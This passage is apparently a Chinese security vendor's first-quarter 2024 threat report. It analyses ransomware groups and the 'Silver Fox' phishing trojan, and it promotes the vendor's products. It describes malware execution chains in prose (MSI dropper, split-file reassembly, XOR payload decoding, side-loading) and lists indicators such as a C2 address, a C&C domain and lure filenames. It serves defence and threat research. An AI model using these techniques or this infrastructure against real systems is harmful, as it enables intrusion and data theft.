1、-1-亚信安全2024年 第一季度 网络安全威胁报告 应急响应中心 2024年5月 -2-前言前言 亚信安全2024年第一季度网络安全威胁报告的发布旨在从一个全面的视角解析当前的网络安全威胁环境。此报告通过详尽梳理和总结2024年第一季度的网络攻击威胁，目的是提供一个准确和直观的终端威胁感知。帮助用户更好地识别网络安全风险，并采取有效的防御策略。如下是报告内容摘要：2024年第一季度，亚信安全积极应对威胁，共截获了8,378,240个恶意样本，平均每天拦截9万个恶意样本。2024年第一季度，亚信安全拦截勒索软件攻击共计12,603次，从全球拦截数量分析，科威特位居勒索软件感染数量首位，占比达到

2、36%，其次是土耳其和阿拉伯联合酋长国。从勒索攻击行业分析，全球银行业以29%的比重居首位，其次是科技行业和政府。而我国则是制造业遭遇勒索攻击居首位，其次是医疗和通信行业。漏洞利用依然是勒索行为的主要攻击手段。同时，勒索软件越来越倾向于进行跨平台攻击，其使用的加密技术也在持续提升。“银狐”组织通过即时通信软件和钓鱼邮件向财税相关人员发动定向攻击。亚信安全持续追踪“银狐”组织，发布了“银狐”治理方案。依托于技术、人员和服务，针对“银狐”木马进行事前风险排查，事中应急处置和事后安全加固。在攻防演练即将到来之际，亚信安全重磅发布攻防演练解决方案3.0。以攻击者视角评估企业暴露的外部攻击面，协助摸清家

3、底、及时收敛外部风险资产、排查敏感数据泄密风险。模拟入侵攻击行为，验证现有安全防护体系的防护能力，包括钓鱼邮件、邮件网关、威胁情报、WAF、威胁防护、终端安全、数据保护等方面。亚信安全勒索攻击演练服务重磅发布。亚信安全通过分析历年勒索攻击事件，提取不同勒索团伙在勒索各阶段常用的攻击手段，孵化出一系列勒索攻击场景，通过模拟勒索攻击的方式，以此验证客户针对于勒索攻击不同阶段的防御能力。-3-目录目录 前言.-2-目录.-3-2024 年第一季度网络安全威胁分析.-4-一、2024 年第一季度共拦截 838 万个恶意样本.-4-二、勒索攻击态势分析.-6-三、“银狐”组织利用财税钓鱼发动定向攻击.-

4、17-四、卷王“银狐”进化成“树狼”.-25-五、恶意软件伪装成名单册进行攻击.-30-2024 年第一季度网络安全威胁治理.-35-一、银狐治理方案发布.-35-二、攻防演练解决方案 3.0 重磅发布.-38-三、勒索攻击演练服务重磅发布.-40-2024 年第一季度网络安全数据分析.-42-一、病毒拦截信息统计.-42-二、勒索软件信息统计.-43-三、挖矿病毒信息统计.-45-四、漏洞攻击拦截统计.-47-4-2024年年第第一一季度季度网络安全网络安全威胁威胁分析分析 一、一、2 202024 4年年第第一一季度季度共拦截共拦截8 83838万个恶意万个恶意样本样本 2024年第一季度

5、，亚信安全积极应对威胁，共截获了8,378,240个恶意样本，平均每天拦截9万个恶意样本。这些恶意样本包括各种恶意软件、病毒、木马等，它们的目标是危害个人用户、企业组织和公共机构的计算机系统和数据。与上个季度相比，第一季度拦截的恶意样本数量有所减少。这表明随着技术的进步和安全意识的增强，亚信安全的客户能够更加有效地抵御恶意攻击活动。尽管如此，数字威胁的不断演变使安全专家们不得不保持警惕，并持续开发出更强大的防御手段。这需要密切关注新的攻击技术和威胁趋势，并及时采取相应措施，例如实时监控、网络流量分析、威胁情报共享等，以提前发现并遏制恶意样本的传播。【2023年4月-2024年3月恶意样本月拦截

6、数量图】从恶意样本检测类型来看TROJ(木马程序)以57%的比重位居首位，其次是PE(感染型病毒)、Adware(广告软件)、Mal(恶意软件)和WORM(蠕虫病毒)。这些病毒类型有其特定的功能和攻击方式。木马程序通常伪装成合法软件，秘密执行恶意活动，例如窃取个人信息或允许远程控制。PE感染型病毒利用可执行文件格式来传播恶意代码，常见于通过电子邮件或下载不安全文件时感染系统。广告软件则通过弹出广告来干扰用户，有时还会监控用户行为以投放定向广告。而广义上的Mal包括各类恶意软件，它们可能具有破坏数据、11243795 23506821 34121151 12190518 13646358 901

7、1700 6927606 6052271 4282250 3642615 2056388 2679237 05,000,00010,000,00015,000,00020,000,00025,000,00030,000,00035,000,00040,000,000病毒检测情况病毒检测情况-5-窃取凭证或创建后门的功能。蠕虫病毒能自我复制并通过网络传播，它们不依赖于宿主文件，能快速在网络中造成广泛感染。【2024年第1季度恶意样本检测类型TOP 10】亚信安全将持续监控病毒发展趋势，继续致力于提供高效而可靠的安全解决方案，以确保用户和企业的数字资产得到充分的保护。同时，用户和组织也需保持警惕，

8、采取必要的网络安全措施，如使用强密码、及时更新软件和系统补丁、谨慎点击可疑链接和附件等，以最大程度地降低受到威胁的风险。TROJ（木马程序）（木马程序）57%PE（感染型病毒）（感染型病毒）15%Adware（广告软件）（广告软件）10%Mal（恶意软件）（恶意软件）7%WORM（蠕虫病毒）（蠕虫病毒）4%EXPL（漏洞利用）（漏洞利用）3%HTML（HTML脚本病毒）脚本病毒）1%TSPY（间谍软件）（间谍软件）1%X97M（Excel宏病毒）宏病毒）1%W97M（Word宏病毒）宏病毒）1%-6-二二、勒索攻击态势分析勒索攻击态势分析 2024年第一季度，亚信安全拦截勒索攻击共计12,60

9、3次，较上一季度拦截攻击数量有所减少。从全球拦截数量看，科威特位居勒索软件感染数量首位，占比达到36%，其次是土耳其和阿拉伯联合酋长国。【2024第1季度勒索软件全球感染国家分布】本季度，全球多个国家的不同行业遭遇了勒索团伙攻击。其中，银行业遭遇勒索攻击的数量以 29%居首位，其次是科技行业和政府。而我国则是制造业遭遇勒索攻击居首位，其次是医疗和通信行业。【2024第1季度勒索软件攻击行业分布】科威特科威特36%土耳其土耳其27%阿拉伯联合酋长国阿拉伯联合酋长国9%印度印度6%巴西巴西5%智利智利5%卡塔尔卡塔尔4%美国美国3%南非南非3%以色列以色列2%银行银行29%科技科技25%政府政府1

10、5%医疗医疗6%交通交通5%石油和天然气石油和天然气5%金融金融4%通讯通讯4%制造业制造业4%传媒传媒3%-7-勒索团伙攻击事件分析勒索团伙攻击事件分析 除了分析感染国家和感染行业的分布，我们还对本季度的勒索攻击事件进行了深入研究。我们观察到，这些攻击背后的勒索团伙不仅包括新兴的团伙，还有包括一些“老牌”团伙再次浮现。我们详细梳理了五个典型的勒索案例，深入分析了这些勒索攻击事件背后的团伙，揭露了他们的攻击手法，并探讨了他们的未来发展趋势。这样的分析帮助我们更好地理解勒索软件的演变，以及制定有效的防护策略。LockBitLockBit新版本新版本LockBitLockBit-NGNG-DevD

11、ev勒索勒索 自 2020 年初开始运营 RaaS 组织的 LockBit 已发展成为勒索软件生态圈中最大的 RaaS组织之一，该组织目前已造成数千名受害者，是迄今为止对金融行业造成最大威胁的勒索组织。LockBit 勒索团伙使用联盟模式运营，在协商并支付赎金后，收益在开发人员及其关联公司之间分配。LockBit 通常收取 20%的赎金份额，其余 80%归负责勒索软件攻击的联盟成员所有。LockBit 以创新而闻名，其发布了多个版本的勒索软件，从最初的 v1（2020 年 1 月）到 LockBit 2.0（2021 年 6 月开始），再到 LockBit 3.0（从 2022 年 3 月开始

12、）。勒索团伙引入了 LockBit Linux 来实现对 Linux 和 VMWare ESXi 系统的攻击。近日，我们发现了LockBit 新版本LockBit-NG-Dev，该版本是在今年2月19日LockBit 团伙被捣毁后发布的，说明LockBit 勒索团伙正在试图卷土重来。【LockBit 在其新的泄漏网站上公布的第一名受害者的帖子】该版本与以往的LockBit版本有所不同，采用了.NET编程语言并配合CoreRT编译，这使得它能在多个操作系统上运行。为了逃避静态检测，其使用MPRESS进行打包。除此之外，新版本具有多种加密模式，包括快速、间歇、全加密三种，其可以根据文件扩展名配置执

13、行不同的加密模式。快速加密：只加密文件的第一个0 x1000字节。间歇性加密：根据配置加密文件的特定部分。全加密：加密整个文件。-8-LockBit-NG-Dev使用AES算法加密文件，并使用嵌入的RSA公钥加密AES密钥。AES密钥是为每个要加密的文件随机生成的。其将被加密文件进行随机命名，以增加数据恢复的难度。此外，它还配备了自删除机制，可以通过将LockBit文件内容覆盖为零字节来实现。善于利用善于利用WebWeb应用漏洞的应用漏洞的TellYouthePassTellYouthePass勒索勒索 2024年第一季度，研究人员监测到数千台运行财务管理服务的计算机设备被植入勒索软件。经关联

14、分析，我们可以确认这一波攻击的来源为TellYouThePass老牌勒索家族。该家族最早于2019年3月出现，惯于在高危漏洞被披露后的短时间内利用漏洞修补的时间差，对暴露于网络上并存在有漏洞的机器发起攻击。其曾经使用永恒之蓝系列漏洞、WebLogic应用漏洞、Log4j2漏洞、国内某OA系统漏洞、国内某财务管理系统漏洞等。利用Web应用漏洞对运行应用的服务器发起勒索攻击是该勒索的典型特征。【Tellyouthepass攻击流程】Tellyouthepass勒索曾多次占据国内勒索软件流行榜的榜首位置。2023年，该勒索团伙发动了3轮较大规模的攻击，包括针对NC服务器勒索攻击，文档安全管理系统攻击

15、和针对医药系统攻击，该系统常用于医药行业的智能仓储管理系统，具备库存盘点、库存对账等功能。黑客攻入该系统并投递勒索病毒，会导致系统中的库存数据库、商品标签等文件被加密，对部署该系统企业商户的数据及财产安全造成巨大威胁。2024年初，Tellyouthepass又开始发动新一轮针对财务电脑的攻击，此次攻击导致众多财务电脑中招，中招电脑的数据库与文档都被加密，并留下勒索信，被加密的文件扩展名被修改为“.locked”。-9-【TellYouthePass勒索信】利用利用VPNVPN漏洞攻击的漏洞攻击的CACTUSCACTUS勒索勒索 2024年初，针对某能源管理公司的勒索攻击引人注目。这次攻击发生

16、在1月中旬，攻击导致该公司可持续发展业务部门丢失1.5TB的数据。此次攻击是因为勒索团伙利用了某软件漏洞获得了公司网络的访问权限，并提升了权限，在部署勒索软件之前进行了敏感数据的窃取。这一策略不仅加密了公司的文件，还威胁受害者，如果不支付赎金，将会泄露其敏感数据。该受害公司确认了此次攻击，并表示其仅受影响的实体是运营在独立网络基础设施上的业务部门。该部门提供有关可再生能源解决方案的咨询服务，并就全球环境和能源法规的遵守向公司提供建议。被盗数据可能包含客户能源使用情况、工业控制和自动化系统以及环境与能源法规遵守情况的敏感信息。另外，在确认受到攻击后，该公司采取了一系列措施来应对这一事件，包括与执

17、法机构合作、加强其网络的安全防护以及通知受影响的客户。此外，公司也在审查其供应链管理和第三方组件的安全性，以减少未来遭受类似攻击的风险。经过调查，该起攻击事件幕后勒索团伙CACTUS浮出水面。该勒索于2023年3月首次被发现，一直保持着活跃状态。CACTUS勒索软件通过Fortinet VPN的已知漏洞进行入侵（黑客首先获取到VPN账号，再通过VPN服务器入侵到组织内部），获取初始访问权限。随后，勒索团伙会通过网络扫描，远控软件和RDP暴力破解在内网横向移动，窃取被害者的重要信息，并将窃取的信息传输到云存储中。最后，勒索团伙对被害机器进行勒索投毒。-10-【CACTUS攻击流程】在内网横向移动

18、阶段，该勒索团伙使用Netscan、PSnmap的修改版本对域内机器进行网络扫描。通过使用PowerShell命令来枚举端点，在Windows事件查看器中查看成功登录来识别用户帐户，并ping远程主机。除此之外，勒索团伙还使用各种合法工具及远程软件对被害者机器进行控制，例如Splashtop、AnyDesk、SuperOps RMM、Cobalt Strike和基于Go的代理工具Chisel。另外，该勒索还通过RDP暴力破解获取内网访问权限。获取到内网机器的访问权限后，勒索团伙首先会窃取被害者的敏感信息，并使用Rclone等常见工具将窃取的信息传输到云存储中，然后再进行手动投毒。在勒索阶段，勒

19、索团伙会威胁用户，如果不缴纳赎金，将会泄露窃取到的数据。在数据加密及数据泄露双重威胁下，用户缴纳赎金的概率将会提高。CACTUS勒索与以往勒索软件相比较，其最大不同之处是利用7-Zip进行防御规避。CACTUS 勒索软件使用批处理脚本提取 7-Zip加密保护的勒索软件二进制文件，然后在执行有效负载之前删除.7z文件。CACTUS勒索软件在加密前会初始化AES密钥以及OpenSSL库，通过OpenSSL库提供加密服务。其还通过创建计划任务达到持久化加密文件目的。在加密过程中，混合使用了 AES 和 RSA 算法，其中，使用 AES 算法对文件数据进行加密，并将加密后的数据写入文件中，然后使用 R

20、SA 公钥对随机生成的加密密钥进行加密，并在文件夹中留下勒索信息说明文件。为防止受害者通过备份恢复数据，其会删除卷影副本。-11-【CACTUS勒索信】双重勒双重勒索索RA WorldRA World 2024年，RA World勒索软件继承了2021年解散的Babuk勒索软件团伙的源代码，发起了针对全球多个国家和地区的攻击，尤其集中在医疗保健和金融行业。这个团伙利用Babuk的源代码，开发出了新的勒索软件变种，对目标组织发动多阶段攻击，这些攻击涵盖了美国、德国、印度等医疗机构。RA World勒索团伙采用双重勒索策略，通过加密和窃取数据来迫使受害者支付赎金。该勒索软件通过入侵域控服务器获取到

21、初始访问权限、通过计算机组策略对象（GPO）获取部署恶意组件所需的访问权限，禁用反病毒软件，最终在受害机器上部署勒索软件，并-12-加密文件。【RA World攻击流程】RA World勒索软件使用了curve25519和eSTREAM密码hc-128算法对文件进行加密，确保了加密过程的安全性，提升了加密文件的解密难度。其在加密文件后，会在被加密的文件名中添加后缀.RAWLD。【RA World勒索信】-13-实现跨平台攻击的实现跨平台攻击的Agenda Agenda 勒索勒索 2023年底，Agenda对某个全球最大的汽车零部件供应商进行网络攻击，并将其添加到Agenda Tor数据泄露勒索

22、网站中。勒索团伙发布了多个泄露文件，以证明他们涉嫌访问了受害者的系统和文件，包括财务文件、保密协议、报价文件、技术数据表和内部报告。据悉，该汽车零部件开发商和制造商，在全球200+地点拥有超过50000名员工。该公司向众多知名车企销售内饰零部件。【Agenda/Qilin勒索信】经过调查，该起攻击事件是Agenda勒索团伙所为，Agenda勒索也被称为Qilin勒索，该家族的早期版本使用Go 语言编写的，增加了安全分析的难度。其早期版本是针对每位受害者定制的，使用受害者的机密信息(例如泄露的帐户和唯一的公司 ID)作为附加文件扩展名。2023年末，Agenda勒索开始逐渐活跃，今年年初，该家族

23、推出了基于Rust 语言开发的版本，Rust 是一种跨平台语言，可以更轻松地针对 Windows 和 Linux 等不同操作系统定制恶意软件。除了在编译语言上发生变化，该版本勒索还使用间歇性加密方式，以提高加密速度和逃避检测。Agenda 勒索软件组织使用远程监控和管理(RMM)工具以及 Cobalt Strike 来部署勒索软件二进制文件，其通过 PsExec 和 SecureShell 传播，同时还可以利用不同的易受攻击的 SYS 驱动程序进行防御规避。Agenda勒索将使用自定义 PowerShell 脚本在 VMWare vCenter 和 ESXi 服务器之间传播，这可能会影响虚拟机

24、甚至整个虚拟基础架构，导致数据和财务损失，以及虚拟环境中运行的服务中断。-14-【Agenda勒索攻击流程】勒索软件发展趋势勒索软件发展趋势 漏洞利用仍然是勒索的主要攻击手段漏洞利用仍然是勒索的主要攻击手段 TellYouThePass老牌勒索惯于在高危漏洞被披露后的短时间内利用漏洞修补的时间差，对暴露于网络上并存在有漏洞的机器发起攻击。其曾经使用永恒之蓝系列漏洞、WebLogic应用漏洞、Log4j2漏洞、国内某OA系统漏洞、国内某财务管理系统漏洞等。而CACTUS勒索软件通过Fortinet VPN的已知漏洞进行入侵。可见，利用漏洞攻击仍然是成功率较高的攻击方式之一，也是勒索团伙惯用的攻击

25、手法之一。勒索病毒更青睐跨平台攻击勒索病毒更青睐跨平台攻击 跨平台攻击可以感染不同操作系统的设备，如Windows、Linux、Mac等，从而拓展了受害者的范围。无论受害者使用何种操作系统，都有可能成为攻击目标。不同操作系统具有不同的安全防护机制和补丁更新，攻击者可以通过跨平台传播来规避某些特定平台的安全措施。如果某个操作系统的安全性较高，攻击者可以选择攻击其他较为薄弱的操作系统。勒索病毒可以同时利用多个操作系统的漏洞或弱点进行入侵，从而提高了传播的效率。攻击者可以同时针对多个操作系统进行攻击，加快感染速度。勒索加密技术上不断地提升勒索加密技术上不断地提升 勒索攻击团伙会使用不同的加密算法相结

26、合，目的是增强加密安全性、提高加密效率和具有可移植性，可以在不同的操作系统和设备上使用。RA World勒索软件使用了curve25519和eSTREAM密码hc-128算法对文件进行加密，确保了加密过程的安全性，提升了加密文件的解密难度。另外，在加密策略上，勒索团伙可以根据文件类型选择加密方式，利用组合加密方式，快速的加密受害者文件。总的来说，随着勒索团伙不断演进和适应安全防护措施，他们除了在入侵方式上采取-15-了更加复杂和技术化的手段。在加密技术上也进行了深入探索，不断提升。了解这些变化对于企业和个人用户来说是至关重要的，可以帮助提升网络安全意识，加强安全防护措施，并更好地应对勒索攻击的

27、威胁。勒索威胁治理勒索威胁治理方案方案 方舟，全面勒索治理解决方案，为用户构筑覆盖勒索治理“全链条”的安全体系 新一代终端安全TrustOne，围绕终端、专注终端，极简新的终端治理“专家级”方案 云安全DS，最全面、完整的云安全体系，全面覆盖云主机、云原生勒索治理 邮件防护DDEI，勒索防护与治理的基础能力，亚信安全实力优势体现 方舟全面治理勒索威胁方舟全面治理勒索威胁 亚信安全方舟勒索治理解决方案，是亚信安全基于勒索攻击最新研判，并聚焦用户APT治理的痛点需求，全面覆盖勒索攻击入侵、驻留、渗透、控制、外泄到实施的六大阶段，通过终端、云端、网络、边界、身份、数据检测与响应（目前引擎可洞察72个

28、勒索攻击的检测点）的智能化技术联动，打通威胁数据、行为数据、资产数据、身份数据、网络数据等，形成了覆盖“事前、事中、事后”的勒索攻击全链条、全流程治理方案。DDEI将勒索遏制于萌芽将勒索遏制于萌芽 勒索家族通常使用高危定向社工钓鱼的方式进行攻击，对于此种入侵方式，我们建议在源头上进行阻断，亚信安全的信桅高级威胁邮件防护系统【DDEI】专用来检测和阻止定向工程邮件所导致的网络攻击及数据泄漏。它采用先进的恶意软件检测引擎，URL分析以及文件和Web沙箱技术，可快速识别并阻止或隔离这些定向工程邮件。让钓鱼邮件止步于DDEI。TrustOne开启勒索治理新升级开启勒索治理新升级 除了钓鱼邮件，漏洞利用

29、也是勒索病毒经常使用的入侵手段，针对漏洞攻击，亚信安全新一代终端安全【TrustOne】能够 7*24 小时持续不间断识别各类已知资产、发现未知资产、互联网暴露面资产并识别这些资产各类脆弱性，包括漏洞、弱密码、开放端口、网络共享、互联网外联，并提供持续消除暴露面的各类措施，从而领先黑客消弭隐患。具备已知威胁和未知威胁和检测和响应能力、尤其是勒索、挖矿、无文件攻击、APT 攻击的检测和响应能力，从而缩短攻击发现和响应处置时间。攻击面管理攻击面管理-见于未萌，治于未乱见于未萌，治于未乱 从攻击者视角出发，持续不间断发现、评估组织类可被黑客利用的薄弱环节，并显性化、危险指数量化这些薄弱点；基于资产攻

30、击面，通过安全评估模型以及漏洞修复动态优先级算法，建立漏洞修复的优先级，以及修复资源的合理安排，“SSVC+CVSS+资产信息+威胁情报建议=修复优先级”，通过智能算法建立漏洞修复的优先级，在攻击发生前快速修复，从而帮助组织提升主动防御。-16-一体化治理一体化治理-建立有效治理体系建立有效治理体系 勒索治理要摆脱割裂的单点防御方式，在风险洞察、风险评估以及响应处置上实现高效联动，打破攻防不对称。基于TrustOne的升级加持，以AI智能引擎为核心，强化威胁情报能力，同时针对勒索团伙供给链的每个阶段、不同手段，在72个检测点进行主机行为、流量特征、威胁情报、文件等多维度防御部署，实时掌握已知与

31、未知威胁的阻断，提升MTTD及MTTR。原子化能力原子化能力-轻量与高效同步进化轻量与高效同步进化 通过能力的原子化，TrustOne融合了防病毒、虚拟补丁、EDR、桌管、SDP、VP、网络准入等多项能力的同时，减小了资源占用和业务运行卡顿的问题，将一体化运维处置与勒索高效治理进行了有效融合与升级，也完成了新一代勒索治理的进阶式升级。信舱信舱DS以以“弱弱”制制强两招致胜强两招致胜 远程桌面（RDP）入侵也是勒索病毒经常采用的入侵方式，这种攻击方式对于那些使用弱密码或默认凭据的系统来说尤其危险，因为攻击者可以很容易地通过RDP暴力破解来获取访问权限。因此，弱口令的检查与管理其实是企业安全运营中

32、最为关键、基础的环节，尤其是对于事前预防而言更是重要。做好弱口令扫描和安全基线的核查两大工作，可以及时发现账号口令的安全风险。目前，亚信安全信舱云主机安全等产品都具有弱口令扫描以及安全基线核查的功能模块。其中系统弱口令扫描功能，能够确保不会影响正常业务，快速高效的完成常态化弱口令检测。基线检查能力，能够按照要求对主机进行统一扫描，支持检测操作系统的账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置，并提供检测结果，针对存在的风险配置给出加固建议。-17-三、三、“银狐银狐”组织”组织利用财税钓鱼发动定向攻击利用财税钓鱼发动定向攻击 年初通常是财务工作人员最为忙碌的时期，不仅需

33、要完成年度汇总和各种申报工作，同时也成为了网络攻击者的目标。特别是“银狐”组织，他们利用这一时机，专门针对财务人员发起钓鱼定向攻击。在这类攻击中，攻击者通过即时通信软件向目标用户发送伪装成正常程序或文件的链接，并诱导受害者点击和运行这些文件。一旦用户执行了这些看似无害的文件，攻击者就会利用受害者的电脑作为跳板，通过相同的即时通信软件继续向其他用户传播含有钓鱼木马的链接或文件。这种策略使得木马能够迅速扩散，从而影响更多的用户，扩大攻击的范围和影响。【群发送恶意文件】其常用的钓鱼文件名大多和税务相关，而文件格式则通常有EXE可执行程序、CHM文档、MSI安装包、VBS脚本等。如下是钓鱼文件常见文件

34、名：关于办理个人专项附加扣除信息确认的通知-操作步骤说明 2024财会人员薪资补贴调整 稽查局企业稽查名单 为了规避安全软件的侦测，银狐组织不断更新其攻击手段。与之前直接在群内发送恶意可执行文件的方式不同，他们现在发送一个看似无害的Excel文件，以此降低用户的戒备心。用户在打开这个Excel文件后会看到其中包含一个链接。如果用户点击了这个链接，就会被引导到一个伪装的下载页面，这个页面会诱导用户下载一个远程控制木马。一旦安装，这种木马便能控制受害者的计算机并执行非法操作。-18-【“银狐”钓鱼文件执行流程】除了通过即时通信软件传播，“银狐”组织还通过钓鱼邮件传播，钓鱼邮件可以发送给更多的人群，

35、扩大其攻击范围，使更多的人成为受害者。我们近期截获的针对财税岗位钓鱼邮件，其正文包含钓鱼链接，打开链接后，访问的是“银狐”组织精心设计的钓鱼网站，若在此钓鱼网站点击下载文件，实质上下载的是远控木马。【“银狐”钓鱼邮件样例】-19-【“银狐”钓鱼网站样例】不管通过哪种途径渗透受害者的设备，银狐组织的最终目的都是部署远程控制木马，以便控制受害者的电脑执行非法操作。他们持续升级攻击策略、部署手段以及恶意样本的传播方式，以应对安全软件的检测。此外，银狐木马还采用了多种免杀技术，比如使用合法程序进行伪装（白加黑）、对恶意载荷进行加密、以及直接在内存中加载，这些手法都是为了逃避安全软件的侦测。【银狐传播方

36、式】-20-一季度，我们截获了使用MSI安装程序进行载荷投递实现免杀的“银狐”变种文件，其中，变种一是使用MSI安装程序释放GhostRAT。通过MSI释放多个组件，执行批处理文件（BAT），进一步运行可执行程序。其载荷在执行前经历了两次解密，这种多层解密技术可以有效地隐藏恶意代码的真实意图，使得静态分析更加困难。其最终在白样本的内存空间中执行GhostRAT恶意代码，有效逃避基于行为的检测机制。变种二则是基于系统环境释放和执行EXE文件。此变种首先判断受害系统是否安装了微信，然后释放EXE文件，EXE文件访问一个控制服务器的FTP地址，在内存解密payload，最终实现的远控功能允许攻击者从

37、远程位置控制受感染的计算机，执行各种恶意活动。【MSI程序执行流程】如下是“银狐”MSI变种一的完整执行逻辑：受害者双击运行伪装成税务稽查名单的MSI文件，释放多个文件到C:WindowsHAHA 目录。执行样本后，启动多个进程，进程启动顺序：-21-Msiexec.exe/MSIBD5.TMP/cmd.exe/CNM.exe/erp.exe 其执行后释放多个组件到特定目录。具体组件及功能如下：文件名文件名 功能功能 释放来源释放来源 C:WindowsHAHAxo.had 加密的可执行文件 MSIEXEC.exe C:WindowsHAHAopk.txt 加密的可执行文件 MSIEXEC.e

38、xe C:WindowsHAHA1.txt CNM.exe的前半部分 MSIEXEC.exe C:WindowsHAHA2.txt CNM.exe的后半部分 MSIEXEC.exe C:WindowsHAHA3.jpg libcurl.dll的前半部分 MSIEXEC.exe C:WindowsHAHA4.jpg libcurl.dll的后半部分 MSIEXEC.exe C:WindowsHAHAlpo.bat 拼接1.txt/2.txt为CNM.exe，3.jpg/4.jpg为libcurl.dll，并运行CNM.exe。随后自删除 MSIEXEC.exe C:WindowsHAHAerp.

39、exe 带数字签名的白EXE文件 加载导入函数curl_easy_init(libcurl.dll)MSIEXEC.exe C:WindowsHAHAmsvcp100.dll 带微软签名的DLL MSIEXEC.exe C:WindowsHAHAmsvcr100.dll 带微软签名的DLL MSIEXEC.exe C:WindowsHAHAlibcurl.dll 解密加载xo.had CMD.exe(lpo.bat)C:WindowsHAHACNM.exe 带虚假签名的恶意程序 解密加载opk.txt CMD.exe(lpo.bat)具体执行流程如下：1.受害者双击运行MSI文件，Window

40、s调用MSIexec.exe安装上述程序，并释放多个文件到C:WindowsHAHA 2.MSIEXEC.exe调用cmd.exe运行lpo.bat；该脚本合并1.txt/2.txt 为CNM.exe，合并3.jpg/4.jpg为libcurl.dll，随后运行CNM.exe并自删除。【lpo.bat文件】3.CNM.exe读取opk.txt并对内容逐字节异或0 x6C，随后开辟空间执行。-22-4.内存中执行的代码，其主要功能为提权并执行erp.exe。5.erp.exe调用libcurl.dll的导出函数curl_easy_init。6.该函数读取xo.had文件，开辟空间并解密存放到内存

41、段；随后调用CryptEnumOIDInfo API，将解密的恶意代码作为回调函数执行。-23-7.解密的恶意代码具有多个功能，如识别防病毒、键盘记录。【识别防病毒】【键盘记录】C2地址为206.238.199.99:49780(TCP)-24-银狐更新快、变种多，免杀技术不断提升，亚信安全专家团队会持续追踪银狐病毒，不断提高对银狐病毒的分析及检测能力。为了避免被银狐木马感染，相关用户应该保持警惕，并采取一些防护措施。以下是一些防护措施，以帮助相关用户避免被银狐木马感染：更新操作系统和应用程序。定期检查并安装操作系统和应用程序的更新，这些更新通常包含安全补丁，可以修复已知的安全漏洞。使用强密码

42、和双重身份验证。设置复杂且难以猜测的密码，并启用双重身份验证（2FA）增加账户的安全性。警惕电子邮件附件和链接。不打开来自未知来源的电子邮件附件，不点击未经验证的链接。这些都是常见的感染途径。安全下载软件。只从官方网站或可信渠道下载软件，避免使用未经授权的第三方应用市场或链接。安装和定期更新安全软件。安装防病毒和反恶意软件程序，并确保它们保持最新状态，以便识别和阻止最新的威胁。小心即时通讯工具中的文件和链接。对即时通讯工具中接收的文件和链接保持警惕，特别是压缩包和未经请求的文件。培训和安全意识教育。对员工进行定期的安全培训，提高他们识别和应对网络钓鱼攻击、社会工程学以及其他网络威胁的能力。这些

43、措施不仅能帮助用户保护自己不受银狐木马的影响，也对企业和组织的网络安全至关重要。通过积极防御和持续的安全教育，可以显著降低被感染的风险。-25-四、四、卷王卷王“银狐银狐”进化进化成成“树狼”“树狼”近日，亚信安全威胁团队狩猎发现了“银狐”变种“树狼”。“树狼”又名“雪狼”，于2023年首次被发现，其使用HFS搭建平台存储文件，且通常以微信投递钓鱼文件为主，假借“税务”、“稽查”等名义，同时还发现一些利用微信发送钓鱼链接，以及通过QQ、TG传递欺诈性文件的行为。此外，还有一些通过电子邮件投递以“律师函”为主题的钓鱼文件的情况。“树狼”和“雪狼”组织的样本行为及手法上与银狐具有极高的重合度。“树

44、狼树狼”使用的使用的RAT 近期发现该组织使用过的远控木马有DCrat、farfli以及gh0st等。Dark Crystal RAT（DcRAT）是一款俄罗斯商业后门软件，首次亮相于2018年，经过一年的重新构建后再次发布。与那些专注于定制化恶意软件以攻击政府和企业目标的大型威胁组织不同，DcRAT似乎是个别黑客的独立创作，提供了一种经济实惠的后门工具，其价格明显低于市面上类似工具的标准价位。作为商业远程访问木马(RAT)中最实惠的之一，DcRAT主要在俄罗斯地下论坛上销售，近期的价格约为600卢布起(约合45元人民币)，订阅期为两个月，特别促销期间价格甚至更为低廉。因此，在专业黑客和脚本小

45、子团体中都备受追捧。武器库如下：后门后门 功能功能 Orcus RAT 激活摄像头和麦克风 DropboxAES RAT 远程访问木马 AgentTesla 收集用户终端上的隐私数据信息上传C&C服务器 Gh0st 大灰狼 AsyncRAT 截取屏幕 键盘记录 上传/下载/执行文件 持久化 禁用 Windows Defender 关机/重启 DOS 攻击 DcRAT 远程访问，后利用和信息泄露 Farfli 文件管理、键盘记录、远程桌面控制、系统管理、视频查看、语音监听、远程定位等远程操纵的高威胁功能 Androm 将被控机变为傀儡机 -26-时间线时间线 【时间线】钓鱼诱饵钓鱼诱饵 通过该组

46、织使用“2024税务年度收支报表自动扣除项电脑版”、“关于2023年违法乱纪单位名单”、“责令限期整改公告名单”等作为钓鱼诱饵的压缩包文件，压缩包解压后有一个c+写的MFC程序，降低了查杀的可能性，该程序是下载器，用于后续后门下载。狩猎过程中关联到该组织使用HFS框架，部分使用pexpay82.icu作为C&C的样本payload使用gh0st。-27-老样本下载地址使用123pan的直连，直连特征为“域名/用户id/目录”，根据关联样本的时间线看该组织从去年10月就开始活动。存储样本的服务器站点如图所示（目前已无法打开），该组织喜欢使用香港IP作为服务器存放样本，香港服务器具有无需备案、速度

47、与稳定性高，国内外都能访问、价格便宜等特点，深受黑灰产喜爱。-28-针对tg的木马：归因归因 雪狼组织命中银狐规则(body=*预览版&body=*文件)|(title=*文件下载)；树狼命中了我们半个月前发现的“银狐Puppet”变种。以上家族都是使用hfs搭建文件存储服务，下载一个税务稽查、律师函之类比较敏感的文件，最后释放gh0st远控。钓鱼界面也比较类似，如下图所示：文件托管网站均为HFS搭建，如下图所示：-29-服务器大多部署在中国香港：结合以上特征，亚信安全威胁追踪团队判断树狼、雪狼、银狐同属于一个组织。-30-五五、恶意软件伪装成名单册进行攻击恶意软件伪装成名单册进行攻击 亚信安

48、全威胁情报部门在日常狩猎过程中发现，近期有黑产团伙伪装成名单册对企业高层进行定向攻击，恶意软件下载页面如下：恶意软件下载网站（来源：亚信安全威胁情报中心）恶意软件详细分析恶意软件详细分析 样本下载链接：https:/tmp-titan.vx- 下载exe文件：802c928140a01ed991db3badfb3cb558f08ba4bde8963b5d3d6b98806c99d8cb 抓包初步探测：180.163.246.xx:443解析到，检测是否能出网，若不能出网则不进行下一步操作。网络行为（来源：亚信安全威胁情报中心）-31-对尝试网络连接：网络连接测试（来源：亚信安全威胁情报中心）从

